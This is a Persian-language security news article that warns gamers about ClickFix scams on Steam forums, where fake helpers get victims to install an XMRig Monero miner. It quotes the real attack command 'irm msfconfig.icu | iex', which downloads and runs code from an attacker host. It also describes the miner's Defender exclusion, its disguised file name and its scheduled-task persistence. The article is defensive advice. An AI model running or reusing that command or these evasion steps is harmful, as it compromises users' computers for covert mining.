حمله ClickFix به فرومهای استیم؛ گیمرها چگونه قربانی استخراج رمزارز میشوند؟
حمله ClickFix به فرومهای Steam گیمرها را هدف گرفته است. مهاجمان با دستور PowerShell، ماینر XMRig را نصب کرده و از سیستم قربانی برای استخراج Monero استفاده میکنند.
حملات ClickFix این بار فرومهای استیم را هدف قرار دادهاند. مهاجمان با انتشار پاسخهایی که ظاهراً حاوی راهحل مشکلات فنی بازیها هستند، کاربران را فریب میدهند تا یک دستور مخرب PowerShell را اجرا کنند؛ دستوری که در نهایت میتواند یک ماینر رمزارز را روی کامپیوتر قربانی نصب کند.
در سال ۲۰۲۶ شاهد افزایش قابلتوجه حملات ClickFix بودهایم. مجرمان سایبری مرتباً روشهای جدیدی برای سوءاستفاده از این تکنیک پیدا میکنند و حالا گیمرها نیز به یکی از اهداف اصلی آن تبدیل شدهاند.
بر اساس گزارشهای منتشرشده، مهاجمان در فرومهای Steam خود را بهعنوان کاربران باتجربه معرفی کرده و برای مشکلاتی مانند کرش کردن بازی، ناپدید شدن آیتمهای داخل بازی یا سایر خطاهای فنی، راهکارهایی ظاهراً مفید ارائه میکنند.
مشکل زمانی آغاز میشود که کاربر به این توصیهها اعتماد کرده و دستور پیشنهادی را در PowerShell با دسترسی Administrator اجرا میکند.
ClickFix چیست و چرا به فرومهای Steam رسیده است؟
بسیاری از گیمرها برای حل مشکلات بازیهای خود به انجمنهای استیم مراجعه میکنند. از پیدا کردن راهحل یک باگ گرفته تا رفع مشکلات اجرای بازی، کاربران معمولاً به تجربه و پیشنهادهای سایر بازیکنان اعتماد دارند.
مهاجمان دقیقاً از همین اعتماد سوءاستفاده میکنند.
در این روش، فرد مهاجم در پاسخ به پرسش یک کاربر، خود را مانند یک کاربر عادی و کمکرسان نشان میدهد. سپس پیشنهاد میکند برای برطرف کردن مشکل، PowerShell را بهصورت Administrator اجرا کرده و یک دستور مشخص را در آن وارد کنید.
این دستور ممکن است ظاهری کاملاً فنی و بیخطر داشته باشد، اما در واقع میتواند یک اسکریپت مخرب را از سرور مهاجم دانلود و اجرا کند.
نکته خطرناک اینجاست که حمله فقط کاربری را که سؤال را مطرح کرده تهدید نمیکند. کاربران دیگری که با جستوجوی گوگل به همان صفحه فروم میرسند نیز ممکن است همان دستور را اجرا کرده و قربانی شوند.
ClickFix چگونه قربانی را فریب میدهد؟
ClickFix بر پایه مهندسی اجتماعی عمل میکند. در این حملات، مهاجم الزاماً سیستم قربانی را مستقیماً هک نمیکند؛ بلکه کاری میکند که خود کاربر، ناخواسته مراحل لازم برای آلوده شدن دستگاه را انجام دهد.
این تکنیک پیشتر در قالبهایی مانند موارد زیر نیز دیده شده است:
- CAPTCHAهای جعلی
- خطاهای جعلی مرورگر
- پیامهای هشدار ساختگی
- راهکارهای تقلبی برای رفع خطاهای نرمافزاری
- دستورهای جعلی برای اجرای PowerShell یا Terminal
وجه مشترک همه این روشها این است که کاربر را متقاعد میکنند یک دستور مخرب را خودش اجرا کند.
دستور مخرب PowerShell چه کاری انجام میدهد؟
یکی از دستورهایی که در این حملات مشاهده شده، به شکل زیر است:
irm msfconfig.icu | iex
این دستور ممکن است برای کاربری که با PowerShell آشنایی ندارد، شبیه یک فرمان ساده مرتبط با تنظیمات ویندوز به نظر برسد؛ اما عملکرد واقعی آن بسیار خطرناکتر است.
برای درک بهتر، میتوان دستور را به دو بخش اصلی تقسیم کرد:
۱. irm چیست؟
irm مخفف Invoke-RestMethod است؛ یکی از دستورات داخلی PowerShell که میتواند به یک آدرس اینترنتی متصل شده و دادهای را از آن دریافت کند.
در این حمله، آدرس اینترنتی مشخصشده متعلق به زیرساخت مهاجم است و میتواند یک اسکریپت PowerShell مخرب را در پاسخ ارسال کند.
۲. iex چیست؟
iex مخفف Invoke-Expression است. این دستور محتوایی را که دریافت کرده، بهعنوان کد PowerShell اجرا میکند.
بنابراین ترکیب این دو دستور باعث میشود سیستم ابتدا محتوای ارسالشده از سرور مهاجم را دریافت و سپس همان کد را بلافاصله اجرا کند.
آیا میتوان محتوای دستور را بدون اجرای آن بررسی کرد؟
از نظر فنی، حذف بخش iex باعث میشود محتوای دریافتشده بهجای اجرا شدن، در PowerShell نمایش داده شود.
به همین دلیل، اجرای کورکورانه دستورهایی که در فرومها، شبکههای اجتماعی، چتها یا بخش نظرات از سوی افراد ناشناس پیشنهاد میشوند، بسیار خطرناک است.
قاعده ساده این است: اگر دقیقاً نمیدانید یک دستور PowerShell چه کاری انجام میدهد، آن را اجرا نکنید.
مهاجمان در نهایت چه چیزی روی کامپیوتر نصب میکنند؟
در این کمپین، هدف نهایی مهاجمان نصب یک ماینر رمزارز XMRig است.
اسکریپت PowerShell طوری طراحی شده که شبیه یک ابزار بهینهسازی ویندوز عمل کند. پس از اجرا، پیامهایی به کاربر نمایش داده میشود که ظاهراً نشان میدهند سیستم در حال انجام عملیات مختلفی است؛ برای مثال:
- پاکسازی فایلهای موقت
- پاکسازی کش DNS
- بهروزرسانی درایورها
- بررسی خطاهای دیسک
- غیرفعال کردن برنامههای غیرضروری هنگام Startup
- اسکن سیستم برای شناسایی بدافزار
- تعمیر Windows Image
- بررسی یکپارچگی فایلهای سیستمی
اما این فعالیتها عمدتاً برای منحرف کردن توجه کاربر طراحی شدهاند.
در پسزمینه، مراحل اصلی حمله در حال اجرا هستند.
XMRig چیست؟
XMRig یک ابزار متنباز و قانونی برای استخراج رمزارز است و بهخودیخود بدافزار محسوب نمیشود.
مشکل زمانی ایجاد میشود که مهاجمان بدون اطلاع یا رضایت کاربر، این نرمافزار را روی سیستم او نصب و اجرا کنند.
در این حمله، اسکریپت مخرب ابتدا بررسی میکند که آیا با دسترسی Administrator اجرا شده است یا خیر. در صورت داشتن این سطح دسترسی، یک پوشه مخفی با مسیر زیر ایجاد میشود:
C:\Windows\Background
سپس این پوشه به فهرست استثناهای Microsoft Defender اضافه میشود. در نتیجه، فایلهایی که در آن قرار میگیرند ممکن است توسط آنتیویروس داخلی ویندوز اسکن نشوند.
در مرحله بعد، فایل اجرایی XMRig دانلود شده و در همان پوشه با نامی ظاهراً قانونی مانند system.exe ذخیره میشود.
چرا گیمرها هدف جذابی برای ماینرهای رمزارز هستند؟
کامپیوترهای گیمینگ مدرن معمولاً از CPU و GPU قدرتمند برخوردارند؛ سختافزاری که توان پردازشی بالایی دارد و میتواند برای استخراج رمزارز مورد سوءاستفاده قرار بگیرد.
پس از اجرای XMRig، منابع پردازشی سیستم قربانی برای استخراج رمزارز Monero استفاده میشود و درآمد حاصل از استخراج به مهاجمان میرسد.
این اتفاق میتواند پیامدهای مختلفی برای کاربر داشته باشد، از جمله:
- کاهش شدید عملکرد کامپیوتر
- افت FPS در بازیها
- افزایش مصرف برق
- افزایش دمای CPU و GPU
- فشار بیشتر روی قطعات سختافزاری
- کاهش عمر مفید برخی قطعات
- افزایش مصرف منابع سیستم در پسزمینه
ماینر چگونه بعد از ریاستارت سیستم فعال میماند؟
مهاجمان برای اینکه XMRig پس از خاموش و روشن شدن کامپیوتر نیز اجرا شود، یک وظیفه جدید در Windows Task Scheduler ایجاد میکنند.
نام این وظیفه چیزی شبیه موارد زیر است:
XMRig-{computer name}
به این ترتیب، ماینر میتواند با هر بار راهاندازی ویندوز بهصورت خودکار اجرا شود.
چگونه از حملات ClickFix و ماینرهای رمزارز جلوگیری کنیم؟
مهمترین راه مقابله با این حملات، اعتماد نکردن به دستورهای ناشناس است.
برای محافظت از کامپیوتر گیمینگ خود، نکات زیر را جدی بگیرید:
۱. دستورهای ناشناس PowerShell را اجرا نکنید
اگر فردی در فروم، چت، شبکه اجتماعی یا بخش نظرات از شما خواست دستوری را در PowerShell، Windows Terminal یا Command Prompt کپی و اجرا کنید، قبل از هر کاری درباره آن تحقیق کنید.
۲. قبل از زدن Enter، عملکرد دستور را بررسی کنید
بهخصوص اگر دستور شامل عباراتی مانند irm، iex یا دانلود و اجرای مستقیم فایل از اینترنت است، با احتیاط بسیار بیشتری عمل کنید.
صرف اینکه یک کاربر در فروم استیم ادعا میکند این دستور مشکل بازی شما را برطرف میکند، به معنی امن بودن آن نیست.
۳. آنتیویروس را فقط به خاطر اجرای بازی غیرفعال نکنید
یکی از باورهای رایج میان گیمرها این است که آنتیویروس باعث افت محسوس عملکرد بازی میشود. در حالی که راهکارهای امنیتی مدرن، بهخصوص در حالت Gaming Mode، برای کاهش مزاحمت هنگام بازی طراحی شدهاند.
غیرفعال کردن آنتیویروس برای چند FPS بیشتر میتواند در مقابل یک بدافزار یا ماینر رمزارز، هزینه بسیار بیشتری داشته باشد.
۴. از یک راهکار امنیتی معتبر استفاده کنید
یک نرمافزار امنیتی مناسب میتواند تلاش برای دانلود یا اجرای فایلهای مشکوک را شناسایی و مسدود کند.
اگر از کامپیوتر گیمینگ استفاده میکنید، بهتر است راهکاری را انتخاب کنید که Gaming Mode داشته باشد تا هنگام اجرای بازی، اعلانهای غیرضروری و فعالیتهای مزاحم کاهش پیدا کنند، بدون اینکه لایههای اصلی امنیتی کامپیوتر خاموش شوند.
جمعبندی
حمله ClickFix به فرومهای Steam نمونه دیگری از این واقعیت است که مهندسی اجتماعی همچنان یکی از ابزارهای مؤثر مجرمان سایبری محسوب میشود.
مهاجمان در این روش بهجای اینکه مستقیماً سیستم گیمر را هک کنند، از اعتماد او به سایر کاربران سوءاستفاده کرده و یک دستور PowerShell را بهعنوان راهکار رفع مشکل بازی معرفی میکنند.
اجرای این دستور میتواند به دانلود و اجرای اسکریپت مخرب و در نهایت نصب XMRig منجر شود؛ نرمافزاری که منابع سختافزاری کامپیوتر را برای استخراج رمزارز Monero در اختیار مهاجمان قرار میدهد.
بنابراین اگر در فرومهای استیم یا هر انجمن آنلاین دیگری با کاربری مواجه شدید که برای رفع مشکل بازی از شما میخواهد یک دستور PowerShell را با دسترسی Administrator اجرا کنید، قبل از هر اقدامی درباره آن دستور تحقیق کنید و هرگز کد ناشناس را کورکورانه اجرا نکنید.